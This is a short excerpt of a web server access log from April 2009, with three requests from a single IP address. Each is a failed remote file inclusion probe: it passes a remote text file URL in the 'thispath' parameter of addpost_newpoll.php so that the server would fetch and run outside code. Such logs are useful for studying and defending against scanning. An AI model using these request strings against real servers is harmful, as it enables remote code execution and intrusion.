69.64.34.249 - - [17/Apr/2009:11:49:31 -0500] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.64.34.249 - - [17/Apr/2009:11:49:31 -0500] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.64.34.249 - - [17/Apr/2009:11:49:31 -0500] "GET /logs/access_log.1238112000//addpost_newpoll.php?addpoll=preview&thispath=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
